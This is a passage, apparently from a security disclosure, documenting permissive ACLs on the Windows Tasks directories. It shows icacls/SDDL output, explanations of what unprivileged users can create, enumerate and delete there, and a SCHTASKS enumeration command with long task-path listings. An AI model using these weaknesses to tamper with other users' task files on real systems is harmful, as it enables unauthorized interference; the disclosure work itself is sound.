CREATOR OWNER:(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 files Volume in drive C: has no label. Volume Serial Number is 1957-0427 File Not Found C:\windows\SysWoW64\Tasks "D:PAI(A;CI;FA;;;BA)(A;OI;0x1f019f;;;BA)(A;CI;FA;;;SY)(A;OI;0x1f019f;;;SY)(A;CI;FW;;;AU)(A;CI;FW;;;NS)(A;CI;FW;;;LS)(A;OICIIO;FA;;;CO)" C:\Windows\SysWOW64\Tasks BUILTIN\Administrators:(CI)(F) BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO) NT AUTHORITY\SYSTEM:(CI)(F) NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO) NT AUTHORITY\Authenticated Users:(CI)(W,Rc) NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc) NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc) CREATOR OWNER:(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 filesOops: all (unprivileged) users are granted
FILE_LIST_SUBDIRECTORY,
FILE_ADD_FILE,
FILE_READ_EA,
FILE_TRAVERSE,
FILE_READ_ATTRIBUTES,
READ_CONTROL and
SYNCHRONIZE access for the
directory %SystemRoot%\Tasks\ – they can create
files there, can enumerate them all, including those created by
other users, and can delete their own files.
OOPS: all (unprivileged) users are
granted FILE_ADD_FILE,
FILE_ADD_SUBDIRECTORY,
FILE_WRITE_EA,
FILE_WRITE_ATTRIBUTES,
READ_CONTROL and
SYNCHRONIZE access for the
directories %SystemRoot%\System32\Tasks\,
%SystemRoot%\SysWoW64\Tasks\ and all
their subdirectories, independent of their owner – they can
create files and subdirectories anywhere, can enumerate their own
subdirectories, including the files (and subdirectories) created
there by other users, and can delete all files and empty
subdirectories, including those created by other users, in their
own subdirectories.
OUCH⁰: thanks
to the inheritable
ACE
(A;CI;FW;;;AU)
of the directories %SystemRoot%\System32\Tasks\ and,
%SystemRoot%\SysWoW64\Tasks\, (unprivileged) users who
guess the (of course rather unlikely) name of a subdirectory like
Microsoft created by careless and
clueless developers can enumerate and remove such
subdirectories completely!
Execute the following command line to enumerate all task files in
the directories %SystemRoot%\System32\Tasks\,
%SystemRoot%\SysWoW64\Tasks\ and all
their subdirectories:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @ECHO %SystemRoot%\System32\Tasks%~?
ERROR: No mapping between account names and security IDs was done. C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater C:\Windows\System32\Tasks\Microsoft\Windows\Autochk\Proxy C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\Scheduled C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver C:\Windows\System32\Tasks\Microsoft\Windows\End Of Support\Notify1 C:\Windows\System32\Tasks\Microsoft\Windows\End Of Support\Notify1 C:\Windows\System32\Tasks\Microsoft\Windows\End Of Support\Notify2 C:\Windows\System32\Tasks\Microsoft\Windows\Location\Notifications C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\WinSAT C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURActivate C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\StartRecording C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\CorruptionDetector C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector C:\Windows\System32\Tasks\Microsoft\Windows\MobilePC\HotStart C:\Windows\System32\Tasks\Microsoft\Windows\MUI\LPRemove C:\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Background Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Logon Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem C:\Windows\System32\Tasks\Microsoft\Windows\RAC\RacTask C:\Windows\System32\Tasks\Microsoft\Windows\RAC\RacTask C:\Windows\System32\Tasks\Microsoft\Windows\Registry\RegIdleBackup C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify C:\Windows\System32\Tasks\Microsoft\Windows\Setup\EOSNotify2 C:\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls C:\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\AutoWake C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\GadgetManager C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\SessionAgent C:\Windows\System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders C:\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR C:\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR C:\Windows\System32\Tasks\Microsoft\Windows\Task Manager\Interactive C:\Windows\System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict1 C:\Windows\System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict2 C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange C:\Windows\System32\Tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary C:\Windows\System32\Tasks\Microsoft\Windows\WindowsBackup\ConfigNotification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader C:\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask C:\Windows\System32\Tasks\WPD\SqmUpload_S-1-5-21-820728443-44925810-1835867902-1000OUCH¹: contrary to the highlighted statements of their documentation cited above, the Schtasks command line utility runs with user privileges!
Run the command line from the previous step 2. on Windows 11 25H2 too:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @ECHO %SystemRoot%\System32\Tasks%~?
C:\Windows\System32\Tasks\OneDrive Reporting Task-S-1-5-21-1717989741-1660040995-2455016376-1002 C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1717989741-1660040995-2455016376-1002 C:\Windows\System32\Tasks\OneDrive Startup Task-S-1-5-21-1717989741-1660040995-2455016376-1002 C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical C:\Windows\System32\Tasks\Microsoft\Windows\AccountHealth\RecoverabilityToastTask C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated) C:\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) C:\Windows\System32\Tasks\Microsoft\Windows\AppID\PolicyConverter C:\Windows\System32\Tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\SdbinstMergeDbTask C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\SdbinstMergeDbTask C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\appuriverifierdaily C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\appuriverifierinstall C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState C:\Windows\System32\Tasks\Microsoft\Windows\ApplicationData\DsSvcCleanup C:\Windows\System32\Tasks\Microsoft\Windows\AppListBackup\Backup C:\Windows\System32\Tasks\Microsoft\Windows\AppListBackup\BackupNonMaintenance C:\Windows\System32\Tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup C:\Windows\System32\Tasks\Microsoft\Windows\Autochk\Proxy C:\Windows\System32\Tasks\Microsoft\Windows\BitLocker\BitLocker Encrypt All Drives C:\Windows\System32\Tasks\Microsoft\Windows\BitLocker\BitLocker MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask C:\Windows\System32\Tasks\Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask C:\Windows\System32\Tasks\Microsoft\Windows\capabilityaccessmanager\maintenancetasks C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam C:\Windows\System32\Tasks\Microsoft\Windows\Chkdsk\ProactiveScan C:\Windows\System32\Tasks\Microsoft\Windows\Chkdsk\SyspartRepair C:\Windows\System32\Tasks\Microsoft\Windows\CloudExperienceHost\CreateObjectTask C:\Windows\System32\Tasks\Microsoft\Windows\CloudRestore\Backup C:\Windows\System32\Tasks\Microsoft\Windows\CloudRestore\Backup C:\Windows\System32\Tasks\Microsoft\Windows\CloudRestore\Restore C:\Windows\System32\Tasks\Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask C:\Windows\System32\Tasks\Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask C:\Windows\System32\Tasks\Microsoft\Windows\Containers\CmCleanup C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Check And Scan C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Check And Scan C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Scan C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Scan for Crash Recovery C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag C:\Windows\System32\Tasks\Microsoft\Windows\Device Information\Device C:\Windows\System32\Tasks\Microsoft\Windows\Device Information\Device C:\Windows\System32\Tasks\Microsoft\Windows\Device Information\Device User C:\Windows\System32\Tasks\Microsoft\Windows\Device Setup\Driver Recovery on Reboot C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\Scheduled C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\UnexpectedCodepath C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DirectXDatabaseUpdater C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DirectXDatabaseUpdater C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DXGIAdapterCache C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DXGIAdapterCache C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DXGIAdapterCache C:\Windows\System32\Tasks\Microsoft\Windows\DiskCleanup\SilentCleanup C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver C:\Windows\System32\Tasks\Microsoft\Windows\DiskFootprint\Diagnostics C:\Windows\System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense C:\Windows\System32\Tasks\Microsoft\Windows\DUSM\dusmtask C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP Inaccessible Credentials Task C:\Windows\System32\Tasks\Microsoft\Windows\EDP\StorageCardEncryption Task C:\Windows\System32\Tasks\Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\Feedback\Siuf\DmClient C:\Windows\System32\Tasks\Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload C:\Windows\System32\Tasks\Microsoft\Windows\File Classification Infrastructure\Property Definition Sync C:\Windows\System32\Tasks\Microsoft\Windows\FileHistory\File History (maintenance mode) C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\GovernedFeatureUsageProcessing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataFlushing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataFlushing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataFlushing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\OneSettings\RefreshCache C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\OneSettings\RefreshCache C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\OneSettings\RefreshCache C:\Windows\System32\Tasks\Microsoft\Windows\Hotpatch\Monitoring C:\Windows\System32\Tasks\Microsoft\Windows\Hotpatch\Monitoring C:\Windows\System32\Tasks\Microsoft\Windows\Hotpatch\Monitoring C:\Windows\System32\Tasks\Microsoft\Windows\input\InputSettingsRestoreDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\LocalUserSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\MouseSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\PenSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\RemoteMouseSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\RemotePenSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\RemoteTouchpadSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\syncpensettings C:\Windows\System32\Tasks\Microsoft\Windows\input\TouchpadSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\RestoreDevice C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdatesAsUser C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\WakeUpAndContinueUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\WakeUpAndScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\International\Synchronize Language Settings C:\Windows\System32\Tasks\Microsoft\Windows\International\Synchronize Language Settings C:\Windows\System32\Tasks\Microsoft\Windows\Kernel\La57Cleanup C:\Windows\System32\Tasks\Microsoft\Windows\LanguageComponentsInstaller\Installation C:\Windows\System32\Tasks\Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources C:\Windows\System32\Tasks\Microsoft\Windows\Location\WindowsActionDialog C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\WinSAT C:\Windows\System32\Tasks\Microsoft\Windows\Management\Autopilot\DetectHardwareChange C:\Windows\System32\Tasks\Microsoft\Windows\Management\Autopilot\DetectHardwareChange C:\Windows\System32\Tasks\Microsoft\Windows\Management\Autopilot\RemediateHardwareChange C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\Cellular C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\Logon C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\Retry C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\RunOnReboot C:\Windows\System32\Tasks\Microsoft\Windows\Maps\MapsToastTask C:\Windows\System32\Tasks\Microsoft\Windows\Maps\MapsUpdateTask C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\AutomaticOfflineMemoryDiagnostic C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic C:\Windows\System32\Tasks\Microsoft\Windows\MUI\LPRemove C:\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService C:\Windows\System32\Tasks\Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies C:\Windows\System32\Tasks\Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies C:\Windows\System32\Tasks\Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies C:\Windows\System32\Tasks\Microsoft\Windows\NlaSvc\WiFiTask C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Background Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Logon Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\PCRPF\PCR Prediction Framework Firmware Update Task C:\Windows\System32\Tasks\Microsoft\Windows\PerformanceTrace\RequestTrace C:\Windows\System32\Tasks\Microsoft\Windows\PerformanceTrace\WhesvcToast C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Device Install Group Policy C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Device Install Reboot Required C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Device Install Reboot Required C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers C:\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem C:\Windows\System32\Tasks\Microsoft\Windows\Printing\EduPrintProv C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTask C:\Windows\System32\Tasks\Microsoft\Windows\RecoveryEnvironment\VerifyWinRE C:\Windows\System32\Tasks\Microsoft\Windows\ReFsDedupSvc\Initialization C:\Windows\System32\Tasks\Microsoft\Windows\Registry\RegIdleBackup C:\Windows\System32\Tasks\Microsoft\Windows\Servicing\OOBEFodSetup C:\Windows\System32\Tasks\Microsoft\Windows\Servicing\StartComponentCleanup C:\Windows\System32\Tasks\Microsoft\Windows\Setup\PITRTask C:\Windows\System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup C:\Windows\System32\Tasks\Microsoft\Windows\Shell\CreateObjectTask C:\Windows\System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitor C:\Windows\System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask C:\Windows\System32\Tasks\Microsoft\Windows\Shell\IndexerAutomaticMaintenance C:\Windows\System32\Tasks\Microsoft\Windows\Shell\ThemesSyncedImageDownload C:\Windows\System32\Tasks\Microsoft\Windows\Shell\UpdateUserPictureTask C:\Windows\System32\Tasks\Microsoft\Windows\Shell\UpdateUserPictureTaskContained C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceAgentTask C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceAgentTask C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask C:\Windows\System32\Tasks\Microsoft\Windows\StateRepository\MaintenanceTasks C:\Windows\System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Management Initialization C:\Windows\System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Optimization C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Sustainability\PowerGridForecastTask C:\Windows\System32\Tasks\Microsoft\Windows\Sustainability\PowerGridForecastTask C:\Windows\System32\Tasks\Microsoft\Windows\Sustainability\SustainabilityTelemetry C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\HybridDriveCachePrepopulate C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\HybridDriveCacheRebalance C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\ResPriStaticDbSync C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask C:\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR C:\Windows\System32\Tasks\Microsoft\Windows\Task Manager\Interactive C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\ForceSynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\ForceSynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Zone\SynchronizeTimeZone C:\Windows\System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\WCM\WiFiTask C:\Windows\System32\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange C:\Windows\System32\Tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask C:\Windows\System32\Tasks\Microsoft\Windows\WlanSvc\CDSSync C:\Windows\System32\Tasks\Microsoft\Windows\WlanSvc\MoProfileManagement C:\Windows\System32\Tasks\Microsoft\Windows\WlanSvc\MoProfileManagement C:\Windows\System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Logon Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Maintenance Work C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Device-Join C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Device-Join C:\Windows\System32\Tasks\Microsoft\Windows\Workplace 